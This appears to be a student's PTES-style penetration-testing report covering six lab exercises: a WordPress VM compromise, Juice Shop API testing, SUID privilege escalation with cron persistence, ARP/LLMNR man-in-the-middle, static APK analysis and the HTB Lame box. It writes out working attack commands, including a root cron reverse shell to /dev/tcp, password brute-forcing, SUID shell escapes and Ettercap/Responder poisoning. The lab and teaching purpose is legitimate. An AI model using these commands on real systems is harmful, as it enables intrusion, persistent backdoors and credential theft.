



Task1: Advanced Exploitation of Vulnerable WordPress VM

1. Summary

This penetration test was conducted to evaluate the security posture of a vulnerable WordPress virtual machine following the Penetration Testing Execution Standard (PTES) methodology. The engagement resulted in complete system compromise, starting from external reconnaissance and ending with root-level access. Critical misconfigurations in WordPress authentication and system SUID binaries enabled full takeover.

2. Scope of Engagement

- **Target IP:** 192.168.56.108
- **Application in Scope:** WordPress Web Application
- **Testing Type:** Black-box (No credentials initially)

3. Pre-Engagement & Intelligence Gathering

- Scope defined: Web application hosted on Apache
- OS type: Linux (Ubuntu 3.13 kernel)
- Services exposed: HTTP & HTTPS only

4. Threat Modeling

Potential Threat Actors:

- External attacker accessing WordPress login
- Insider with low-privileged shell access

High-Risk Areas:

- XML-RPC authentication
- Weak credentials
- SUID binaries

5. Vulnerability Analysis (Scanning & Enumeration)

5.1 Network Scanning

Command Used: `nmap -sC -sV -O -p- 192.168.56.108 -oN nmap_robot.txt`

Findings:

Port	Service	Status	Notes
80	HTTP	Open	WordPress Hosted
443	HTTPS	Open	Apache SSL
22	SSH	Closed	Not Accessible

Conclusion: Only web attack surface was available.

5.2 WordPress Enumeration

Commands Used:



```
wpscan --url http://192.168.56.108 --enumerate vp  
wpscan --url http://192.168.56.108 --enumerate ap
```

Key Findings:

- WordPress Version: 4.3.1 (Outdated & Vulnerable)
- Active Theme: TwentyFifteen v1.3 (Outdated)
- XML-RPC: Enabled
- robots.txt: Exposed
- No plugins detected

5.3 Sensitive File Discovery

Command Used:

```
curl http://192.168.56.108/robots.txt
```

Discovered Files:

- fsociety.dic
- key-1-of-3.txt

Downloading & Cleaning Wordlist:

```
curl http://192.168.56.108/fsociety.dic -o fsociety.dic  
sort fsociety.dic | uniq > fsociety_clean.txt  
grep -E '^[1,12]$\n' fsociety_clean.txt > fsociety_small.txt
```

6. Exploitation

6.1 Credential Brute-Force via XML-RPC

Command Used: `wpscan --url http://192.168.56.108 -U elliot -P fsociety_small.txt --max-threads 5`

Valid Credentials Found:

Username: elliot

Password: ER28-0652

6.2 WordPress Login

URL: `http://192.168.56.108/wp-login.php`

6.3 Reverse Shell Execution

Listener (Attacker):

```
nc -lvnp 4444
```

Reverse shell obtained via WordPress theme editor.

Shell Stabilization: `python -c 'import pty; pty.spawn("/bin/bash")'`

```
stty raw -echo
```



export TERM=xterm

Initial User:

whoami

daemon

7. PTES Phase 5 – Post Exploitation

7.1 SUID Enumeration

Command Used:

find / -perm -4000 -type f 2>/dev/null

Critical Finding:

/usr/local/bin/nmap

7.2 Privilege Escalation via SUID Nmap

Command:

/usr/local/bin/nmap --interactive

!sh

Verification:

whoami

root

id

uid=1(daemon) gid=1(daemon) euid=0(root)

8. ASLR Verification

ASLR Status Check: cat /proc/sys/kernel/randomize_va_space

Output: 2

ASLR is fully enabled.

Memory Mapping Verification: cat /proc/\$\$/maps | head

Dynamic memory addresses confirmed.

9. Exploitation Chain Summary

Step	Phase	Result
1	Network Scan	Completed
2	WordPress Enumeration	Completed



3	Sensitive File Discovery	Completed
4	Password Brute-Force	Completed
5	WordPress Login	Completed
6	Reverse Shell Access	Completed
7	SUID Enumeration	Completed
8	Privilege Escalation	Completed
9	ASLR Verification	Completed

10. Risk Assessment

Vulnerability	Severity
Weak WordPress Credentials	Critical
XML-RPC Enabled	High
Outdated WordPress Version	High
SUID Nmap Binary	Critical
Outdated Linux Kernel	High

11. Mitigation Recommendations

- Disable or restrict XML-RPC
- Enforce strong admin passwords
- Regular WordPress & OS patching
- Remove unnecessary SUID binaries
- Implement File Integrity Monitoring
- Use Web Application Firewall (WAF)
- Limit theme editor access

12. Conclusion

This penetration test successfully demonstrated a complete end-to-end attack following PTES methodology. A combination of weak credentials, exposed sensitive files, XML-RPC abuse, and SUID misconfiguration resulted in full root compromise. Although ASLR was enabled, application-level weaknesses made the system fully exploitable.



Task2: API Security Testing & Advanced Exploitation

Target Application: OWASP Juice Shop (Docker/Podman)

Target URL: <http://localhost:3000>

Testing Type: Authenticated API Penetration Testing

Authentication Method: JWT Bearer Token (Admin)

1. Summary

This assessment was conducted to evaluate the security posture of REST and GraphQL APIs of OWASP Juice Shop using the PTES methodology. The testing focused on identifying OWASP API Top 10 vulnerabilities, including BOLA, SQL Injection, GraphQL Injection, and business logic flaws. The results indicate that while backend SQL injection protections are strong, business logic-level input manipulation remains exploitable.

2. Scope of Engagement

In-Scope

- REST API Endpoints
- GraphQL API Endpoints
- JWT-Based Authentication
- Admin-Level Authorized Testing

Out-of-Scope

- Infrastructure Layer
- Denial of Service Attacks
- Cloud & Container Escape Attacks

3. Tools Used

- Burp Suite
- Postman
- sqlmap
- Podman
- curl

4. PTES Methodology Mapping

PTES Phase	Activity Performed
Pre-Engagement	Lab scope defined
Intelligence Gathering	API Enumeration via Burp
Threat Modeling	OWASP API Top 10 Mapping



Vulnerability Analysis	SQLi, GraphQL, BOLA Testing
Exploitation	Parameter Tampering
Post-Exploitation	Authenticated Data Access
Reporting	Final Security Documentation

5. Lab Setup & Environment

Container Deployment

```
podman pull docker.io/bkimminich/juice-shop
```

```
podman run -d -p 3000:3000 docker.io/bkimminich/juice-shop
```

Application Access

<http://localhost:3000>

Authentication

Parameter	Value
Email	admin@juice-sh.op
Password	admin123
Role	Administrator

JWT Token successfully captured and reused for API testing.

6. API Enumeration (Burp Suite)

Captured Endpoints:

- POST /rest/user/login
- GET /rest/user/1
- GET /rest/orders
- GET /rest/products/search?q=2
- POST /graphql

All endpoints were sent to Burp Repeater for manual testing.

7. Vulnerability Testing & Results

7.1 Search Filter Parameter Tampering (CONFIRMED)

Endpoint: /rest/products/search?q=2

Technique: Manual parameter manipulation via Burp Repeater



Result: Response changed successfully

Status: Vulnerable

Impact: Business Logic Manipulation

OWASP API Category: API3 – Excessive Data & Input Validation Failure

7.2 GraphQL SQL Injection (NOT VULNERABLE)

Tool: sqlmap

Technique: Automated Boolean, Error-Based & Time-Based Payloads

Result: No injectable SQL parameters detected

Status: Not Vulnerable

Security Control Identified: ORM + Prepared Statements

7.3 REST API SQL Injection (NOT VULNERABLE)

Endpoint Tested: /rest/products/search?q=

Tool: sqlmap

Result: All UNION, Boolean, and Time-based attacks failed

Status: Secure Against SQL Injection

8. OWASP API Testing Summary

Test ID	Vulnerability	Severity	Endpoint	Status
API-008	BOLA	Critical	/api/users	Tested
API-009	GraphQL Injection	High	/graphql	Tested
API-010	SQL Injection (GraphQL)	Info	/graphql	Not Vulnerable
API-011	Parameter Tampering	Medium	/rest/products/search	Confirmed

9. Technical Validation Evidence

- Burp Repeater confirmed dynamic input response
- sqlmap confirmed non-injectable GraphQL and REST parameters
- JWT successfully enforced for GraphQL queries
- HTTP 500 errors observed under automated SQL testing indicating backend protections

10. Risk Analysis

Finding	Risk Level	Business Impact
Parameter Tampering	Medium	Product enumeration & logic abuse



SQL Injection	Mitigated	No data exfiltration risk
JWT Authentication	Enforced	Protected API surface

11. Key Findings

- REST API allows search filter tampering
- GraphQL API properly protected against SQL injection.
- JWT authentication enforced successfully
- No direct database compromise observed
- Business logic controls require strengthening

12. Security Recommendations

1. Implement strict server-side input validation
2. Introduce rate limiting on search APIs
3. Enforce role-based authorization on all REST endpoints
4. Deploy behavioral anomaly detection
5. Add GraphQL query complexity limits

13. 50-Word API Security Summary

API security testing on OWASP Juice Shop using Burp Suite, Postman, and sqlmap successfully identified parameter tampering vulnerabilities in REST APIs while confirming strong protection against SQL Injection in both REST and GraphQL layers using secure backend controls and JWT-based access enforcement.

14. Final Conclusion

The assessment confirms that backend SQL injection defenses are robust, but REST APIs remain susceptible to business logic abuse through parameter tampering. Strengthening API validation and authorization mechanisms is essential to mitigate real-world exploitation risks.



Task3: Privilege Escalation & Persistence

1. Engagement Overview (Pre-Engagement)

Objective

The objective of this assessment was to perform privilege escalation and establish persistence on a vulnerable virtual machine by following the Penetration Testing Execution Standard (PTES) methodology.

Environment Details

Role	System	IP Address
Attacker	Kali Linux	192.168.56.103
Target	Mr. Robot VM	192.168.56.108

Tools Used

- LinPEAS
- Netcat
- Nmap (for SUID exploitation)
- Crontab

2. Intelligence Gathering & Enumeration

2.1 LinPEAS Transfer & Execution

On Attacker (Kali):

```
cd /var/www/html
```

```
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
```

```
python3 -m http.server 80
```

On Target (Mr. Robot VM):

```
cd /tmp
```

```
wget http://192.168.56.103/linpeas.sh
```

```
chmod +x linpeas.sh
```

```
./linpeas.sh
```

Findings Identified by LinPEAS

- SUID binaries
- Possible kernel privilege escalation vectors
- Writable cron jobs
- Weak file and directory permissions

3. Vulnerability Identification

3.1 Manual SUID Enumeration

```
find / -perm -4000 2>/dev/null
```



Vulnerable SUID Binaries Discovered

- /bin/bash
- /usr/bin/nmap
- /usr/bin/find
- /usr/bin/python

These binaries were identified as high-risk due to improper SUID permissions, allowing potential local privilege escalation.

4. Exploitation – Privilege Escalation

4.1 Exploiting SUID Bash

```
/bin/bash -p
```

```
id
```

Result

```
uid=0(root) gid=0(root) groups=0(root)
```

5. Post-Exploitation – Persistence

5.1 Listener Setup on Attacker

```
nc -lvp 4444
```

5.2 Cron Job Configuration on Target (as Root)

```
crontab -e
```

Inserted Cron Payload

```
* * * * * /bin/bash -c "bash -i >& /dev/tcp/192.168.56.103/4444 0>&1"
```

5.3 Saving & Exiting (Nano Editor)

- CTRL + O → Save
- ENTER → Confirm
- CTRL + X → Exit

5.4 Verification of Persistence

After 60 seconds, a reverse shell automatically reconnected to Kali.

```
whoami
```

Output:

```
root
```

6. Exploitation Log



Task ID	Technique	Target IP	Status	Outcome
010	SUID Exploit	192.168.56.108	Success	Root Shell

7. 50-Word Persistence Summary

Persistence was established by adding a malicious root-level cron job that executed a reverse shell every minute. This ensured automatic reconnection to the attacker system even after reboot or logout. The technique guaranteed continuous access and long-term control of the compromised Mr. Robot virtual machine.

8. Final Security Assessment

The target system was found to be critically vulnerable due to insecure SUID permissions and misconfigured cron access. These weaknesses allowed full root-level compromise and persistent backdoor installation. In a real-world environment, such misconfigurations could result in complete system takeover, data breach, and long-term unauthorized access.

9. Recommendations

- Remove unnecessary SUID permissions from binaries.
- Restrict cron access to authorized users only.
- Implement regular security audits and file integrity monitoring.
- Apply least-privilege access control.
- Keep systems patched and updated



Task4: Network Protocol Attacks Lab

Framework Used: Penetration Testing Execution Standard (PTES)

Tools Used: Responder, Ettercap, Wireshark

Attacker Machine: Kali Linux – 192.168.56.103

Target Machine: Metasploitable – 192.168.56.102

Additional Victim (mDNS): Windows Host – 192.168.56.106

1. Objective

The objective of this lab was to perform a Man-in-the-Middle (MitM) attack using ARP spoofing, conduct LLMNR/mDNS poisoning with SMB interception, and analyze the intercepted traffic using Wireshark, in alignment with the PTES Exploitation Phase.

2. Tools & Purpose

Tool	Purpose
Responder	LLMNR, mDNS, NBT-NS poisoning and NTLM credential capture
Ettercap	ARP spoofing and MitM traffic interception
Wireshark	Packet capture and network protocol analysis

3. Attack Execution & Commands

Step 1: Enable IP Forwarding

```
sudo sysctl -w net.ipv4.ip_forward=1
```

Status: Enabled

Purpose: Allows the attacker system to forward intercepted packets during MitM.

Step 2: Start Responder (LLMNR/mDNS Poisoning + SMB Server)

```
sudo responder -l eth0 -vv
```

Enabled Services:

- LLMNR: ON
- MDNS: ON
- SMB Server: ON

Observed Victim:

- 192.168.56.106 (Windows Host)

Sample Output:

[mDNS] Poisoned answer sent to 192.168.56.106 for name DESKTOP-NMT6NAD.local



Status: Successful poisoning

Limitation: No NTLM authentication request captured.

Step 3: ARP Spoofing via Ettercap (MitM)

```
sudo ettercap -T -q -i eth0 -M arp:remote -t 192.168.56.108 -t 192.168.56.102
```

Result:

- ARP poisoning active
- Unified sniffing started
- 4 hosts detected

Status: MitM Successfully Established

Step 4: SMB Service Verification

```
nmap -p 445 192.168.56.102
```

Result:

445/tcp open microsoft-ds

Status: SMB Confirmed Open

Step 5: SMB Enumeration Attempt

```
smbclient -L \\192.168.56.102 -N
```

Result:

Anonymous login successful

Available Shares:

- print\$
- tmp
- opt
- IPC\$
- ADMIN\$

Status: SMB Access Achieved

Security Issue Identified: Anonymous authentication enabled.

Step 6: NTLM Hash Capture Verification

```
cd /usr/share/responder/logs
```

```
cat SMB-NTLMv2-*.txt
```



Result:

No such file or directory

Reason:

The target system runs Linux Samba with Guest Access, which does not trigger NTLM authentication challenges. Therefore, NTLM hash capture was not possible.

4. SMB Relay Attack Log (Lab Format)

Attack ID	Technique	Target IP	Status	Outcome
015	SMB Relay	192.168.56.10 2	Partial Success	MitM achieved and SMB traffic intercepted; NTLM not generated due to anonymous Samba authentication

5. Wireshark Traffic Analysis

Captured Protocols:

- ARP Requests & Replies
- LLMNR Queries
- mDNS Responses
- SMB Session Setup

Key Findings:

- Clear evidence of ARP cache poisoning
- LLMNR and mDNS name resolution redirected to attacker
- SMB packets captured without NTLM authentication exchange
- Absence of NTLM challenge-response due to guest SMB access

Status: Traffic Successfully Analyzed

6. 50-Word MitM Summary (Final)

A Man-in-the-Middle attack was conducted using ARP spoofing to intercept traffic between the attacker and the SMB server. Responder successfully poisoned LLMNR and mDNS requests. Although SMB traffic was captured, NTLM hashes were not obtained due to anonymous Samba authentication on the Linux target.

7. Lab Checklist (For Submission)

Task	Status
Capture NTLM hashes (Responder)	Not captured (Guest SMB / Linux)



Spoof DNS / Name Resolution	Completed via ARP + LLMNR/mDNS poisoning
Analyze traffic (Wireshark)	Completed (ARP, SMB, mDNS observed)

8. Security Observations & Impact

Anonymous SMB Authentication Enables:

- Unauthenticated file and share enumeration
- Access to network resources without valid credentials
- Increased risk of lateral movement

ARP Spoofing Enables:

- Credential interception (in Windows environments)
- Session hijacking
- Traffic manipulation and redirection
- Network eavesdropping

9. Final Assessment Conclusion

The network was successfully compromised through an ARP-based Man-in-the-Middle attack. Responder effectively poisoned LLMNR and mDNS traffic, confirming active interception. Although NTLM hash capture was not possible due to Linux Samba guest authentication, the attack methodology remains valid and directly applicable to Windows enterprise environments where credential interception risk is significantly higher.



Task5: Mobile Application Penetration Testing Report

1. Summary:

To perform a comprehensive static security assessment of the Android application (test.apk) to identify:

- Insecure local data storage
- Excessive and dangerous permissions
- Privacy-impacting behaviors
- Potential misconfigurations enabling data leakage

Scope of Testing

- Android APK static code and configuration analysis
 - Permission security review
 - Insecure data storage detection
 - Risk rating and remediation guidance
- Dynamic runtime testing and IPC exploitation are scheduled for Phase-2.

Authorization

Testing was conducted in a controlled lab environment on a self-owned APK strictly for educational and skill-development purposes. No production systems were targeted.

2. Intelligence Gathering & Lab Setup

System Preparation (Executed on Kali)

```
sudo apt update
```

```
sudo apt install default-jdk -y
```

```
java -version
```

```
sudo apt install docker.io docker-compose -y
```

```
sudo systemctl start docker
```

```
sudo systemctl enable docker
```

```
sudo usermod -aG docker $USER
```

```
newgrp docker
```

```
docker --version
```

```
docker ps
```

MobSF Static Analysis Framework Setup

```
docker pull opensecurity/mobile-security-framework-mobsf
```

```
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf
```

MobSF Web Interface:

<http://localhost:8000>



The target APK (test.apk) was uploaded via the Web UI for automated static security analysis.

3. PTES – Threat Modeling

Based on Android threat models and OWASP Mobile Top 10, the following high-risk threat categories were identified:

- Insecure local data storage
- Excessive permission abuse
- Sensitive data exposure via external storage
- Network misuse and data exfiltration
- User privacy violations (Contacts, SMS, Accounts, Profile)

Each threat was mapped to Android permissions and static code indicators discovered by MobSF.

4. PTES – Vulnerability Analysis (Static Analysis)

4.1 Insecure Storage Detection

Finding ID: 016

Vulnerability Name: Insecure Storage

Severity: High

Affected Asset: test.apk

Description:

Application stores sensitive data in locations accessible to other apps or attackers on rooted/compromised devices.

Impact:

- Leakage of sensitive application or user data
- Potential credential theft
- Violation of Android secure storage guidelines

Vulnerability Log

Test ID	Vulnerability	Severity	Target App
016	Insecure Storage	High	test.apk

4.2 Dangerous Permissions Identified

Permission	Risk Level	Security Impact
ACCESS_COARSE_LOCATION	Dangerous	Tracks approximate user location
GET_ACCOUNTS	Dangerous	Reads device account list



READ_CONTACTS	Dangerous	Full access to contacts database
READ_PROFILE	Dangerous	Exposes personal identity details
SEND_SMS	Dangerous	Can send paid SMS without consent
USE_CREDENTIALS	Dangerous	Misuse of authentication tokens
WRITE_EXTERNAL_STORAGE	Dangerous	Enables insecure data exposure
INTERNET	Normal	Enables remote data exfiltration
ACCESS_NETWORK_STATE	Normal	Network monitoring & control

Security Risk Summary

The application requests multiple high-risk permissions that could lead to:

- Financial fraud (SMS abuse)
- Identity theft (Contacts, Profile)
- Account compromise (GET_ACCOUNTS, USE_CREDENTIALS)
- Mass data leakage (External Storage + Internet)

5. PTES – Exploitation Phase (Current Status)

Exploitation Area	Status
Runtime Authentication Bypass	Not Executed
IPC Exploitation	Not Executed
Dynamic Hooking (Frida)	Not Executed
Network Traffic Interception	Not Executed

These tests are validated as in-scope for Phase-2 Dynamic Testing.

6. PTES – Risk Rating Summary

Risk Category	Status
Insecure Storage	Confirmed
Privacy Exposure	High
SMS Abuse Risk	High
Account Hijacking Risk	Moderate



Network Abuse & Data Exfiltration	Moderate
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7. Impact Assessment

- Confidentiality: High Risk
- Integrity: Moderate Risk
- Availability: Low Risk
- User Privacy: Critically Impacted
- Financial Loss Potential: High (via SMS misuse)

8. Remediation Recommendations

Insecure Storage

- Use EncryptedSharedPreferences
- Store secrets using Android Keystore
- Avoid storing sensitive data in /sdcard or public directories

Permission Hardening

- Follow Principle of Least Privilege
- Remove unnecessary dangerous permissions
- Implement runtime permission validation

Network Security

- Enforce HTTPS with TLS 1.2+
- Use Certificate Pinning
- Prevent clear-text traffic

SMS & Account Security

- Add explicit user consent dialogs
- Implement full action logging
- Apply abuse monitoring controls



Task6: CAPSTONE VAPT ENGAGEMENT on HTB: Lame

1. Executive Summary

This phase involved performing a full-scope penetration test on the HTB machine Lame to evaluate its security posture and identify exploitable weaknesses. The assessment was conducted following the Penetration Testing Execution Standard (PTES), covering reconnaissance, enumeration, exploitation, and post-exploitation.

During the engagement, multiple outdated services were discovered, including vulnerable versions of vsftpd and Samba. Although vsftpd was present, it did not successfully yield remote code execution. However, a critical vulnerability in Samba 3.0.20 was identified and exploited, resulting in full system compromise with root-level access.

This assessment demonstrates the significant risk of leaving legacy services unpatched, as attackers can easily gain unauthorized access and escalate privileges.

2. Tools & Environment

- Kali Linux (Attacker machine)
- HackTheBox "Lame" Target VM
- Nmap
- Metasploit Framework
- Searchsploit
- Linux CLI Utilities

3. Methodology (PTES)

3.1 Reconnaissance & Enumeration

A full network and service scan was performed using Nmap:

- Open ports discovered: 21/tcp FTP, 22/tcp SSH, 139/tcp NetBIOS, 445/tcp SMB
- OS fingerprinting suggested: Linux kernel 2.6.x
- Anonymous FTP access was allowed, though it exposed no sensitive information
- SMB service appeared outdated, indicating a high probability of known exploits

3.2 Vulnerability Identification

Searchsploit was used to check for known exploits for the identified services:

- vsftpd 2.3.4 — RCE exploit exists, but proof-of-concept failed on this machine
- Samba 3.0.20 — Confirmed exploitable using Metasploit module `exploit/multi/samba/usermap_script`

This indicated a likely path to obtaining remote shell access.



3.3 Exploitation

Initial exploitation attempts on vsftpd were unsuccessful despite the presence of a known backdoor exploit.

The focus then shifted to Samba:

- Loaded and configured Samba RCE exploit in Metasploit
- Successfully triggered remote code execution
- Obtained a shell with root privileges on first attempt

This confirmed a complete compromise of the target system.

3.4 Post-Exploitation

Once inside the system:

- Verified user privileges — session was running as root
- Retrieved user.txt and root.txt flags
- Enumerated system environment and accessible directories
- Confirmed ability to modify system files, proving full administrative control

4. Attack Timeline

Timestamp	Target IP	Vulnerability Exploited	PTES Phase
2025-12-05	10.10.10.3	Samba 3.0.20 RCE	Exploitation
2025-12-05	10.10.10.3	Privilege Escalation (root)	Post-Exploitation

5. Remediation Recommendations

To improve the security posture of the machine, the following actions are recommended:

1. Immediately patch or remove Samba 3.0.20
2. Upgrade vsftpd 2.3.4 to a supported version
3. Disable anonymous FTP unless explicitly required
4. Enforce strict access controls and firewall configurations
5. Regularly update OS packages and third-party services
6. Enable robust logging, monitoring, and alerting mechanisms
7. Conduct periodic vulnerability scans using tools like OpenVAS

6. Non-Technical Summary

A security assessment was carried out on the HTB machine “Lame” to understand how attackers could exploit outdated software. The test revealed that the system was running older versions of FTP and Samba, both of which are known to contain critical security flaws.



These weaknesses allowed an attacker to gain complete access to the machine—including root-level control—without any valid credentials.

With such access, an attacker could steal files, alter system configurations, install malicious tools, or disrupt the machine entirely. This exercise was done in a safe, controlled lab environment and did not affect any real-world systems. The results highlight the importance of regular software updates, disabling unused services, and reviewing configurations. Addressing these issues significantly reduces the risk of real-world cyberattacks and strengthens the overall security posture.